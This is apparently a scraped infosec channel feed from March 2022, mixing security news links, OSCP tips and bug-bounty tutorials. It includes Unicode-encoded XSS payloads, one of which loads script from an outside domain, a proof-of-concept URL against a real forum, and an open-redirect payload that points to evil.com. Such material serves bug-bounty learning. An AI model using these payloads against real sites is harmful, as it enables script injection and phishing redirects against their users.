Google is officially buying cybersecurity company Mandiant in an all-cash deal approximately valued at $5.4 billion.
Read: https://thehackernews.com/2022/03/google-buys-cybersecurity-firm-mandiant.html
Read: https://thehackernews.com/2022/03/google-buys-cybersecurity-firm-mandiant.html
A newly discovered vulnerability (CVE-2022-25636) in the Netfilter #firewall module of Linux kernel could be exploited to gain root privileges on vulnerable systems, escape containers or cause a kernel panic.
Details: https://thehackernews.com/2022/03/new-linux-bug-in-netfilter-firewall.html
Details: https://thehackernews.com/2022/03/new-linux-bug-in-netfilter-firewall.html
If you use Git on a daily basis,
This cheat sheet is very useful!🔥
#github #developers #git #infosec #cybersecurity
This cheat sheet is very useful!🔥
#github #developers #git #infosec #cybersecurity
👍1
Happy Holi 🔥
To all cyber security researchers,bug hunters, web developers and all in IT's etc. from my side
🌾🌿🌱☘️🍀
Hope all your life fullfill with colours and happiness 😊
#HappyHoli #Holi2022 #infosec #bughunters #CyberSecurtiy
To all cyber security researchers,bug hunters, web developers and all in IT's etc. from my side
🌾🌿🌱☘️🍀
Hope all your life fullfill with colours and happiness 😊
#HappyHoli #Holi2022 #infosec #bughunters #CyberSecurtiy
Ukrainian Secret Service has arrested a hacker who was helping Russian troops invade.
Read details: https://thehackernews.com/2022/03/ukraine-secret-service-arrests-hacker.html
Read details: https://thehackernews.com/2022/03/ukraine-secret-service-arrests-hacker.html
giving some tips 🔥 :-
how to pass oscp exam
🚩👇
check out this post🍁 :-
https://t.co/dezPk3Ujvu
#Pentesting #bugbounty #oscp #offsec #infosec
how to pass oscp exam
🚩👇
check out this post🍁 :-
https://t.co/dezPk3Ujvu
#Pentesting #bugbounty #oscp #offsec #infosec
Medium
Tips on how to pass the new OSCP exam
By Alicia Tan (N0H4TS member)
⚡ Hackers have been spotted deploying a new rootkit targeting Oracle Solaris systems at Banks in an attempt to compromise the switching networks of ATMs (ATM) and perform unauthorized cash withdrawals.
Read: https://thehackernews.com/2022/03/hackers-target-bank-networks-with-new.html
Read: https://thehackernews.com/2022/03/hackers-target-bank-networks-with-new.html
Best Nmap Tutorial for pentesting
Check :-
https://github.com/Ignitetechnologies/Nmap-For-Pentester
#infosec #cybersecurity #cybersecuritytips #pentesting #oscp #informationsecurity #cissp #CyberSec #networking #networksecurity #CheatSheet #infosecurity #cyberattacks #security #linux #UniX #vulnerabilities
Check :-
https://github.com/Ignitetechnologies/Nmap-For-Pentester
#infosec #cybersecurity #cybersecuritytips #pentesting #oscp #informationsecurity #cissp #CyberSec #networking #networksecurity #CheatSheet #infosecurity #cyberattacks #security #linux #UniX #vulnerabilities
GitHub
GitHub - Ignitetechnologies/Nmap-For-Pentester: This cheatsheet was created to assist Red Teamers and Penetration Testers in hunting…
This cheatsheet was created to assist Red Teamers and Penetration Testers in hunting down vulnerabilities using "Nmap." - Ignitetechnologies/Nmap-For-Pentester
Best of Linux Commands Cheat Sheet
#infosec #cybersecurity #pentesting #oscp #informationsecurity #hacking #cissp #redteam #technology #DataSecurity #CyberSec #Hackers #tools #bugbountytips #Linux #websecurity #Network #NetworkSecurity
#infosec #cybersecurity #pentesting #oscp #informationsecurity #hacking #cissp #redteam #technology #DataSecurity #CyberSec #Hackers #tools #bugbountytips #Linux #websecurity #Network #NetworkSecurity
Password Reset Functionality Bugs⬇️
If i missed some vulnerabilities related to password reset functionality comment below👇
#bugbountytips #bugbountytip #cybersecurity #Pentesting #hacker
If i missed some vulnerabilities related to password reset functionality comment below👇
#bugbountytips #bugbountytip #cybersecurity #Pentesting #hacker
Today we have flyer on CDN, Content Delivery Network.
You will learn about :
- What are CDNs ?
- Direct Hosting vs CDN.
- Load Balancing
- Benefits
Please RT for more reach.
Download : https://t.co/hMrurxomvt
Made by @0x1shu
#infosec #appsec #security #bugbounty
You will learn about :
- What are CDNs ?
- Direct Hosting vs CDN.
- Load Balancing
- Benefits
Please RT for more reach.
Download : https://t.co/hMrurxomvt
Made by @0x1shu
#infosec #appsec #security #bugbounty
Here is the OSCP Notes
----Approved by Offensive Security
Check These Great Notes { For Beginner & Advanced }
https://oscpnotes.infosecsanyam.in
#infosec #cybersecurity #bugbounty #bugbountytips #oscp #Notes
#OffensiveSecurity #Pentesting
----Approved by Offensive Security
Check These Great Notes { For Beginner & Advanced }
https://oscpnotes.infosecsanyam.in
#infosec #cybersecurity #bugbounty #bugbountytips #oscp #Notes
#OffensiveSecurity #Pentesting
Forwarded from The Hacker News
A 23-year-old Russian national has been indicted in the U.S. and added to the FBI's Cyber Most Wanted list for allegedly administering a cybercrime forum that sold stolen login credentials, personal and credit card data.
Read: https://thehackernews.com/2022/03/23-year-old-russian-hacker-wanted-by.html
Read: https://thehackernews.com/2022/03/23-year-old-russian-hacker-wanted-by.html
❤1👍1
Unicode #XSS Vectors
Courtesy by @KN0X55
<Svg OnLoad=confirm(1)>
%C0%BCSvg%C0%A0OnLoad%C0%BDconfirm%C0%A81%C0%A9%C0%BE
<Svg OnLoad=import('//X55.is')>
%C0%BCSvg%C0%A0OnLoad%C0%BDimport%C0%A8%C0%A7%C0%AF%C0%https://t.co/CV0GcKUoK1%C0%A7%C0%A9%C0%BE
PoC: https://bbs.tianya.cn/tag/--%3E%C0%BCSvg%C0%A0OnLoad%C0%BDconfirm%C0%A81%C0%A9%C0%BE
Courtesy by @KN0X55
<Svg OnLoad=confirm(1)>
%C0%BCSvg%C0%A0OnLoad%C0%BDconfirm%C0%A81%C0%A9%C0%BE
<Svg OnLoad=import('//X55.is')>
%C0%BCSvg%C0%A0OnLoad%C0%BDimport%C0%A8%C0%A7%C0%AF%C0%https://t.co/CV0GcKUoK1%C0%A7%C0%A9%C0%BE
PoC: https://bbs.tianya.cn/tag/--%3E%C0%BCSvg%C0%A0OnLoad%C0%BDconfirm%C0%A81%C0%A9%C0%BE
bbs.tianya.cn
天涯论坛_全球华人网上家园_天涯社区
天涯论坛是天涯社区旗下的主打论坛产品,24小时随时更新,荟萃天涯社区新鲜、火热、有趣的内容,你感兴趣的都在这里!
Open Redirection issue :
Payload : ///////////////////////////evil.com
Vuln URL:
https://example.com/account/login
Valid Parameter: ?next=
Affected URL :
https://example.com/account/login/?next=///////////////////////////evil.com
#bugbounty #bugbountytips #Redirection
Payload : ///////////////////////////evil.com
Vuln URL:
https://example.com/account/login
Valid Parameter: ?next=
Affected URL :
https://example.com/account/login/?next=///////////////////////////evil.com
#bugbounty #bugbountytips #Redirection
FUZZING FOR BEGINNERS (KUGG teaches STÖK American fuzzy lop)
Credit :- stok
#pentesting #bugbounty #bugbountytips #bugbountytip #infosec #cybersec #resources
https://www.youtube.com/watch?v=O3hb6HV1ZQo&feature=youtu.be
Credit :- stok
#pentesting #bugbounty #bugbountytips #bugbountytip #infosec #cybersec #resources
https://www.youtube.com/watch?v=O3hb6HV1ZQo&feature=youtu.be
YouTube
FUZZING FOR BEGINNERS (KUGG teaches STÖK American fuzzy lop)
In this episode of "STÖK, time to learn something new". KUGG (Christoffer Jerkeby) From F-Secure shows STÖK the basics of FUZZING using American Fuzzy lop. They FUZZ a HTTP server and get two crashes, crashes that with the right exploit could give an attacker…
Blind Cross Site Scripting (XSS) Overview - Bug Bounty Hunting & Web App Pentesting
#pentesting #bugbounty #bugbountytips #bugbountytip #infosec #cybersec #XSS #Blind_XSS
https://t.co/Ijnjjv6ujb
#pentesting #bugbounty #bugbountytips #bugbountytip #infosec #cybersec #XSS #Blind_XSS
https://t.co/Ijnjjv6ujb
YouTube
Blind Cross Site Scripting (XSS) Overview - Bug Bounty Hunting & Web App Pentesting
Sponsor: https://go.intigriti.com/thecybermentor
Links:
https://portswigger.net/web-security/cross-site-scripting/stored/lab-html-context-nothing-encoded
https://xsshunter.com
https://medium.com/bugbountywriteup/blind-xss-for-beginners-c88e48083071
❓Info❓…
Links:
https://portswigger.net/web-security/cross-site-scripting/stored/lab-html-context-nothing-encoded
https://xsshunter.com
https://medium.com/bugbountywriteup/blind-xss-for-beginners-c88e48083071
❓Info❓…